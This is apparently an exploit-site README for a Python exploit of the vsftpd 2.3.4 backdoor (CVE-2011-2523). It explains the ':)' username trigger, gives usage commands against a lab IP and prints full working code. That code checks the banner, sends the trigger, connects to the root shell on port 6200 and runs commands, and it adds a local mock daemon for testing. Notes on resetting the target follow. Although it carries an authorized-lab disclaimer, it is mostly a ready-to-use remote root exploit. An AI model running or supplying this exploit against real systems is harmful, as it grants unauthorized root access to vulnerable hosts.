## https://sploitus.com/exploit?id=A7A90EE8-8AB4-5A6C-B232-E81EB21F6397
# vsftpd 2.3.4 Backdoor Exploit

A small, dependency-free Python 3 exploit for the **vsftpd 2.3.4 backdoor**
(**CVE-2011-2523**). It triggers the backdoor over FTP and drops you into an
interactive root shell on the spawned listener.

Written as a modern replacement for old exploit scripts that depended on
`telnetlib`, which was deprecated in Python 3.11 and removed from the standard
library in Python 3.13. This version uses only the standard library and reads
the shell with `select` instead of a fixed sleep, so output doesn't get truncated.

> ⚠️ **For authorized use only.** This targets a known-vulnerable service and is
> intended for security education and lab environments such as **Metasploitable 2**.
> Only run it against systems you own or have explicit written permission to test.

## How it works

vsftpd 2.3.4 shipped with a malicious backdoor: logging in with any FTP username
containing the sequence `:)` makes the daemon open a listener on **TCP/6200**
that hands the first client to connect a root shell. The script:

1. (Optionally) grabs the FTP banner and checks for `vsftpd 2.3.4`.
2. Sends `USER :)` followed by a `PASS` (any password) to trip the backdoor.
3. Connects to port 6200 (with retries while the listener binds) and drops you
   into an interactive shell, confirming privilege with `id; uname -a`.

## Requirements

- Python 3.x (standard library only, no external packages)

## Usage

```bash
python3 vsftpd_backdoor.py TARGET [-p FTP_PORT] [-s SHELL_PORT] [--skip-verify]
```

Examples:

```bash
# Default: FTP on 21, backdoor shell on 6200, verify banner first
python3 vsftpd_backdoor.py 192.168.243.114

# Non-standard FTP port, skip the banner check
python3 vsftpd_backdoor.py 192.168.243.114 -p 2121 --skip-verify
```

Type commands at the `vsftpd#` prompt; type `exit` (or Ctrl-C) to quit.

## Good to know: port 6200 is a mutex

The backdoor is **one-shot per trigger**: the first connection to 6200 is handed
the shell, and that shell holds the port for as long as it stays open. Nothing
ever accepts a second connection.

Practical consequences:

- **One client at a time.** Don't run this script, `nc`, and Metasploit against
  the same target simultaneously: they'll fight over the single shell slot and
  you'll get confusing failures ("not a fresh shell", connection refused, etc.).
- **Exit cleanly.** Leave the shell with `exit` so the remote process dies and
  releases 6200. Killing the client uncleanly can orphan the process and leave
  the port stuck open.
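The three steps under "How it works" and the one-shot behaviour described in this section, as an added Python 3 example. This is not the project's `vsftpd_backdoor.py` (its source is not on this page) and not vsftpd's code; it is standard-library only. `FakeBackdooredFtpd` is a constructed stand-in for the backdoored daemon so the whole flow can be run and checked on 127.0.0.1: it uses ephemeral ports in place of 21 and 6200, its `id` output is canned, and the second-trigger path is emulated with a flag where the real daemon's `bind()` would fail. The function names, the `x:)` username, and the retry and quiet timings are my choices, not the project's.

```python
import select
import socket
import threading
import time

TRIGGER = b":)"  # username substring that fires the backdoor


def connect_with_retry(host, port, attempts=20, delay=0.25):
    """The listener appears a moment after PASS; retry instead of sleeping."""
    for _ in range(attempts):
        try:
            return socket.create_connection((host, port), timeout=3)
        except OSError:
            time.sleep(delay)
    raise RuntimeError("nothing listening on %s:%d" % (host, port))


def run(sh, cmd, quiet=0.5):
    """Send one line, then read until the shell has been silent for `quiet` s."""
    sh.sendall(cmd.encode() + b"\n")
    out = bytearray()
    while True:
        ready, _, _ = select.select([sh], [], [], quiet)
        if not ready:
            return bytes(out)
        chunk = sh.recv(4096)
        if not chunk:  # remote shell closed (e.g. after `exit`)
            return bytes(out)
        out += chunk


def open_shell(host, ftp_port=21, shell_port=6200, verify=True):
    """Steps 1-3 of the README; returns (shell socket, output of `id`)."""
    with socket.create_connection((host, ftp_port), timeout=5) as ctl:
        banner = ctl.recv(1024)
        if verify and b"vsftpd 2.3.4" not in banner.lower():
            raise RuntimeError("unexpected banner: %r" % banner)
        ctl.sendall(b"USER x" + TRIGGER + b"\r\n")
        reply = ctl.recv(1024)
        if not reply.startswith(b"331"):  # e.g. 530 from an anonymous-only server
            raise RuntimeError("USER rejected: %r" % reply)
        ctl.sendall(b"PASS x\r\n")  # never answered once the trigger fires
        sh = connect_with_retry(host, shell_port)  # control session stays open meanwhile
    who = run(sh, "id")
    if b"uid=" not in who:  # connected, but nothing is serving the port
        sh.close()
        raise RuntimeError("port %d open but no fresh shell" % shell_port)
    return sh, who.decode()


class FakeBackdooredFtpd:
    """Constructed stand-in for the backdoored daemon (not vsftpd): ephemeral
    ports replace 21 and 6200, the shell answers are canned, and the listener
    serves exactly one client and then stays bound, as described above."""

    def __init__(self):
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(5)
        self.ftp_port = self.ftp.getsockname()[1]
        self.listener = socket.socket()  # bound now, listen() only on trigger
        self.listener.bind(("127.0.0.1", 0))
        self.shell_port = self.listener.getsockname()[1]
        self.triggered = False
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            conn, _ = self.ftp.accept()
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = b""
            for line in conn.makefile("rb"):
                cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
                if cmd == b"USER":
                    user = arg
                    conn.sendall(b"331 Please specify the password.\r\n")
                elif cmd == b"PASS" and TRIGGER in user:
                    time.sleep(0.3)  # the real bind is not instantaneous either
                    self._shell()  # PASS gets no reply, as on the real daemon

    def _shell(self):
        if self.triggered:  # real daemon: bind(6200) fails, port still held
            return
        self.triggered = True
        self.listener.listen(1)
        sh, _ = self.listener.accept()  # the one and only accept
        for line in sh.makefile("rb"):
            cmd = line.strip()
            if cmd == b"exit":
                break
            sh.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n" if cmd == b"id"
                       else b"sh: " + cmd + b": not found\n")
        sh.close()
```

Against a real lab target the stand-in is not needed: `open_shell("192.168.243.114")` performs the trigger, the retried connect and the `id` check, and `run(sh, "uname -a")` reads the reply with `select`. A second `open_shell()` while the first shell is still holding the port connects but raises "no fresh shell", which is the failure this section warns about.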

### Resetting a stuck backdoor

If 6200 is already bound (port open but no usable shell), reset the target:

```bash
# On the target console
sudo netstat -tlnp | grep 6200
sudo kill -9 PID   # PID from the last column of the netstat line
```

Or simply reboot the VM for a guaranteed-clean, untriggered backdoor.

## License

Distributed under the MIT License. See `LICENSE` for more information.